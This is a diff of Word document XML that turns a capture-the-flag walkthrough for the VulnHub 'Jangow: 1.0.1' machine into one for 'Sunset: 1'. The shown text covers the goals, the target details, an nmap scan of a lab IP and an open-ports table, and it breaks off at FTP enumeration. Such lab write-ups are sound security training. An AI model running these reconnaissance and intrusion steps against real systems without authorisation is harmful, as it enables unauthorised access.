                                 <w:lid w:val="en-US"/>
                                 <w:storeMappedDataAs w:val="dateTime"/>
@@ -3492,7 +3492,7 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t>3/10/2026</w:t>
+                                  <w:t>3/16/2026</w:t>
                                 </w:r>
                               </w:p>
                             </w:sdtContent>
@@ -3968,7 +3968,7 @@
                                         <w:sz w:val="72"/>
                                         <w:szCs w:val="72"/>
                                       </w:rPr>
-                                      <w:t>7</w:t>
+                                      <w:t>8</w:t>
                                     </w:r>
                                   </w:sdtContent>
                                 </w:sdt>
@@ -4112,7 +4112,7 @@
                                   <w:sz w:val="72"/>
                                   <w:szCs w:val="72"/>
                                 </w:rPr>
-                                <w:t>7</w:t>
+                                <w:t>8</w:t>
                               </w:r>
                             </w:sdtContent>
                           </w:sdt>
@@ -4253,14 +4253,6 @@
                           <wps:txbx>
                             <w:txbxContent>
                               <w:p>
-                                <w:pPr>
-                                  <w:rPr>
-                                    <w:b/>
-                                    <w:bCs/>
-                                    <w:sz w:val="40"/>
-                                    <w:szCs w:val="40"/>
-                                  </w:rPr>
-                                </w:pPr>
                                 <w:r>
                                   <w:rPr>
                                     <w:b/>
@@ -4268,10 +4260,9 @@
                                     <w:sz w:val="40"/>
                                     <w:szCs w:val="40"/>
                                   </w:rPr>
-                                  <w:t>Jangow: 1.0.1 Walkthrough</w:t>
+                                  <w:t>Sunset: 1 Walkthrough</w:t>
                                 </w:r>
                               </w:p>
-                              <w:p/>
                               <w:p>
                                 <w:pPr>
                                   <w:rPr>
@@ -4317,7 +4308,14 @@
                                     <w:sz w:val="28"/>
                                     <w:szCs w:val="28"/>
                                   </w:rPr>
-                                  <w:t xml:space="preserve"> Boot2Root / Linux Exploitation</w:t>
+                                  <w:t xml:space="preserve"> Boot2Root / </w:t>
+                                </w:r>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:sz w:val="28"/>
+                                    <w:szCs w:val="28"/>
+                                  </w:rPr>
+                                  <w:t>Linux Privilege Escalation</w:t>
                                 </w:r>
                               </w:p>
                               <w:p>
@@ -4366,14 +4364,6 @@
                     <v:textbox>
                       <w:txbxContent>
                         <w:p>
-                          <w:pPr>
-                            <w:rPr>
-                              <w:b/>
-                              <w:bCs/>
-                              <w:sz w:val="40"/>
-                              <w:szCs w:val="40"/>
-                            </w:rPr>
-                          </w:pPr>
                           <w:r>
                             <w:rPr>
                               <w:b/>
@@ -4381,10 +4371,9 @@
                               <w:sz w:val="40"/>
                               <w:szCs w:val="40"/>
                             </w:rPr>
-                            <w:t>Jangow: 1.0.1 Walkthrough</w:t>
+                            <w:t>Sunset: 1 Walkthrough</w:t>
                           </w:r>
                         </w:p>
-                        <w:p/>
                         <w:p>
                           <w:pPr>
                             <w:rPr>
@@ -4430,7 +4419,14 @@
                               <w:sz w:val="28"/>
                               <w:szCs w:val="28"/>
                             </w:rPr>
-                            <w:t xml:space="preserve"> Boot2Root / Linux Exploitation</w:t>
+                            <w:t xml:space="preserve"> Boot2Root / </w:t>
+                          </w:r>
+                          <w:r>
+                            <w:rPr>
+                              <w:sz w:val="28"/>
+                              <w:szCs w:val="28"/>
+                            </w:rPr>
+                            <w:t>Linux Privilege Escalation</w:t>
                           </w:r>
                         </w:p>
                         <w:p>
@@ -4506,7 +4502,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Jangow: 1.0.1 Walkthrough</w:t>
+        <w:t>Sunset: 1 Walkthrough</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4557,16 +4553,16 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Difficulty:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Easy</w:t>
+        <w:t>Category:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Boot2Root / Linux Privilege Escalation</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4586,16 +4582,16 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Category:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Linux / Web Exploitation / Command Injection / Privilege Escalation</w:t>
+        <w:t>Difficulty:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Easy</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4616,10 +4612,10 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ACB5C00" wp14:editId="6AD49AE9">
-            <wp:extent cx="5731510" cy="3223895"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="240475999" name="Picture 29"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DAD747" wp14:editId="32E35191">
+            <wp:extent cx="5731510" cy="3000375"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
+            <wp:docPr id="1419168153" name="Picture 29"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4627,7 +4623,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="240475999" name="Picture 240475999"/>
+                    <pic:cNvPr id="1419168153" name="Picture 1419168153"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4645,7 +4641,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3223895"/>
+                      <a:ext cx="5731510" cy="3000375"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4717,7 +4713,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Jangow: 1.0.1 is a vulnerable Linux virtual machine available on the VulnHub platform designed to practice penetration testing techniques such as enumeration, web exploitation, and privilege escalation.</w:t>
+        <w:t>Sunset: 1 is a vulnerable Linux virtual machine from the VulnHub platform designed to test penetration testing skills such as service enumeration, credential discovery, password cracking, and privilege escalation.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4737,7 +4733,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The main goal of this challenge is to:</w:t>
+        <w:t>The objective of this challenge is to:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4757,7 +4753,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>• Perform network enumeration</w:t>
+        <w:t>• Perform network discovery</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4767,7 +4763,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Discover running services</w:t>
+        <w:t>• Identify open services on the target system</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4777,7 +4773,7 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Exploit vulnerabilities in the web application</w:t>
+        <w:t>• Extract credentials from exposed files</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4787,7 +4783,17 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:br/>
-        <w:t>• Gain initial user access</w:t>
+        <w:t>• Crack password hashes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>• Gain system access through SSH</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4903,7 +4909,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:w="3867" w:type="dxa"/>
+        <w:tblW w:w="0" w:type="auto"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblBorders>
           <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -4922,12 +4928,11 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1763"/>
-        <w:gridCol w:w="2104"/>
+        <w:gridCol w:w="1582"/>
+        <w:gridCol w:w="1422"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="410"/>
           <w:tblHeader/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
@@ -4998,7 +5003,6 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="393"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -5058,7 +5062,6 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="410"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -5111,14 +5114,13 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>Jangow 1.0.1</w:t>
+              <w:t>Sunset: 1</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="410"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -5171,14 +5173,13 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>172.20.10.3</w:t>
+              <w:t>172.20.10.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="393"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -5231,14 +5232,13 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>Ubuntu 16.04</w:t>
+              <w:t>Debian Linux</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="410"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -5264,7 +5264,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>Kernel</w:t>
+              <w:t>Access Method</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5291,7 +5291,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>4.4.0-31</w:t>
+              <w:t>SSH</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5299,6 +5299,17 @@
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:outlineLvl w:val="0"/>
         <w:rPr>
@@ -5336,6 +5347,7 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="36"/>
           <w:szCs w:val="36"/>
@@ -5354,7 +5366,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Step 1 — Network Discovery</w:t>
+        <w:t xml:space="preserve">Step 1 — </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Network Discovery</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5374,7 +5400,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The first step was identifying active machines in the local network.</w:t>
+        <w:t>The first step was to identify active machines on the local network.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5488,7 +5514,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>This revealed the target machine.</w:t>
+        <w:t>This scan identified the target machine.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5554,7 +5580,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>172.20.10.3</w:t>
+        <w:t>172.20.10.2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5569,16 +5595,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E895A1" wp14:editId="7DF63ED0">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="1233280722" name="Picture 30"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45380065" wp14:editId="2CC7A02F">
+            <wp:extent cx="5731510" cy="2487930"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
+            <wp:docPr id="1690907709" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5586,17 +5609,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1233280722" name="Picture 1233280722"/>
+                    <pic:cNvPr id="1690907709" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5604,7 +5621,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
+                      <a:ext cx="5731510" cy="2487930"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -5619,8 +5636,61 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Step 2 — </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -5632,21 +5702,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Step 2 — Port Scanning</w:t>
+        <w:t>Port Scanning</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5666,7 +5722,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Next, a port scan was performed to discover open services.</w:t>
+        <w:t>After discovering the target IP, an Nmap scan was performed to identify open ports and services.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5732,27 +5788,38 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>nmap -sC -sV -A 172.20.10.3</w:t>
+        <w:t>nmap -sC -sV -A 172.20.10.2</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Open ports discovered:</w:t>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Open Ports Identified</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5778,7 +5845,7 @@
       <w:tblGrid>
         <w:gridCol w:w="549"/>
         <w:gridCol w:w="827"/>
-        <w:gridCol w:w="1488"/>
+        <w:gridCol w:w="1656"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -5963,7 +6030,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>vsftpd 3.0.3</w:t>
+              <w:t>pyftpdlib 1.5.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5995,7 +6062,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>80</w:t>
+              <w:t>22</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6022,7 +6089,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>HTTP</w:t>
+              <w:t>SSH</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6049,7 +6116,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>Apache 2.4.18</w:t>
+              <w:t>OpenSSH 7.9p1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6072,7 +6139,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>These services became the primary attack surface.</w:t>
+        <w:t>These services provided potential entry points into the system.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6087,16 +6154,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A8718BF" wp14:editId="0726FE4B">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="1617321497" name="Picture 31"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13408BA0" wp14:editId="695E1B45">
+            <wp:extent cx="5731510" cy="4283075"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
+            <wp:docPr id="704402100" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6104,17 +6168,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1617321497" name="Picture 1617321497"/>
+                    <pic:cNvPr id="704402100" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6122,7 +6180,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
+                      <a:ext cx="5731510" cy="4283075"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6162,7 +6220,11 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -6174,7 +6236,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Web Enumeration</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>FTP Enumeration</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6194,27 +6270,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">After identifying port </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
